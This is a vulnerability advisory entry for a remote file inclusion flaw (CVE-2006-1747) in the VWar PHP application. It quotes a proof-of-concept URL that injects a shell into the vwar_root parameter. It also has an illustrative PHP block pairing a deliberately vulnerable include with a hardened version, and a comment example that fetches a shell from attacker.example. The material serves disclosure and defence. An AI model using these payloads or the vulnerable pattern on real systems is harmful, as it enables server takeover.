VWar admin.php Remote File Inclusion Vulnerability

Vulnerability ID: 1110747    Vulnerability type: Input validation
Published: 2006-08-07    Updated: 2006-08-07
CVE ID: CVE-2006-1747    CNNVD ID: CNNVD-200604-180
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/28356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-180
|Vulnerability details
VWar (Virtual War) is a PHP-based virtual war application. The admin.php script in VWar does not properly filter user-supplied request parameters, so an attacker can make it include an arbitrary remote resource as PHP code and execute arbitrary code in the context of the web server.
|Exploit (EXP)
Source: http://www.securityfocus.com/bid/19387/info

VWar is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect version 1.5; other versions may also be vulnerable.

http://www.example.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
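The quoted PoC targets the vwar_root parameter of stats.php, while the details above name admin.php; BID 19387 describes multiple such include points, and the mechanism is the same in each: an include path is built from request input. In the PoC, `[Shell-code]` stands for the URL of an attacker-hosted file containing PHP, and the trailing `?` turns whatever path suffix the script appends into a query string, so the remote fetch still succeeds. The block below is an added illustration of that pattern and of a hardened replacement; it is not VWar's own source. The names `$vwar_root` and `includes/functions_common.php` are assumptions chosen to match the PoC, and the code uses PHP 7+ syntax rather than the PHP 4/5 of 2006.

```php
<?php
// Added illustration (not VWar's own code) of the remote file inclusion
// pattern behind CVE-2006-1747 and a hardened form of the same include.
// $vwar_root and includes/functions_common.php are assumed names.

// --- Vulnerable form --------------------------------------------------
// The application root comes from the request (directly as here, or via
// register_globals on PHP 4/5 when $vwar_root is never initialised) and is
// concatenated into an include path. With allow_url_fopen/allow_url_include
// on, the request
//   stats.php?vwar_root=http://attacker.example/shell.txt?&cmd=ls
// makes PHP fetch http://attacker.example/shell.txt?/includes/functions_common.php
// and execute the response; shell.txt then reads $_GET['cmd'] itself.
function vulnerable_bootstrap(): void
{
    $vwar_root = isset($_GET['vwar_root']) ? $_GET['vwar_root'] : '.';
    require_once($vwar_root . '/includes/functions_common.php');
}

// --- Hardened form ----------------------------------------------------
// 1. Never derive an include path from request data: fix the root relative
//    to the script's own location.
// 2. Treat any request that still carries the parameter as an attack: log and reject.
// 3. Refuse to run at all while remote includes are enabled in php.ini.
define('VWAR_ROOT', dirname(__FILE__));

// Stream wrappers an attacker can use to pull code from outside the docroot.
function looks_like_remote_include(string $value): bool
{
    $wrappers = ['http://', 'https://', 'ftp://', 'ftps://', 'php://', 'data:', 'expect://'];
    $value = strtolower(ltrim($value));
    foreach ($wrappers as $w) {
        if (strncmp($value, $w, strlen($w)) === 0) {
            return true;
        }
    }
    return false;
}

function hardened_bootstrap(): void
{
    if (isset($_REQUEST['vwar_root'])) {
        $v    = (string) $_REQUEST['vwar_root'];
        $kind = looks_like_remote_include($v) ? 'remote include attempt' : 'unexpected vwar_root parameter';
        error_log(sprintf('%s from %s: vwar_root=%s', $kind, $_SERVER['REMOTE_ADDR'] ?? '-', $v));
        http_response_code(400);
        exit('Bad request');
    }
    if (ini_get('allow_url_include')) {
        error_log('allow_url_include is enabled; refusing to start');
        http_response_code(500);
        exit('Server misconfigured');
    }
    // Resolve symlinks and '..', then confirm the file is still under the fixed root.
    $real = realpath(VWAR_ROOT . '/includes/functions_common.php');
    $base = VWAR_ROOT . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $base, strlen($base)) !== 0) {
        http_response_code(500);
        exit('Missing include');
    }
    require_once($real);
}
```

To check a deployment for this pattern, search the tree for include or require statements whose argument starts with a variable (for example `grep -rn 'require.*\$vwar_root' .`) and confirm with `php -i | grep allow_url` that allow_url_include is off; allow_url_fopen alone was enough on the PHP versions current in 2006, so the code-level fix is the one that matters.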
|References

Source: BID
Name: 17443
Link: http://www.securityfocus.com/bid/17443
Source: MILW0RM
Name: 1658
Link: http://www.milw0rm.com/exploits/1658
Source: MISC
Link: http://www.blogcu.com/Liz0ziM/431925/
Source: MISC
Link: http://liz0zim.no-ip.org/vwar.txt
Source: XF
Name: virtualwar-member-file-include(28265)
Link: http://xforce.iss.net/xforce/xfdb/28265
Source: BID
Name: 19387
Link: http://www.securityfocus.com/bid/19387
Source: BUGTRAQ
Name: 20060408 VirtualWar File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/430389/100/0/threaded
Source: MILW0RM
Name: 1658
Link: http://milw0rm.com/exploits/1658
Source: BUGTRAQ
Name: 20060807 VirtualWar v1.5.0 Remote File Include (vwar_root)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=115497619330609&w=2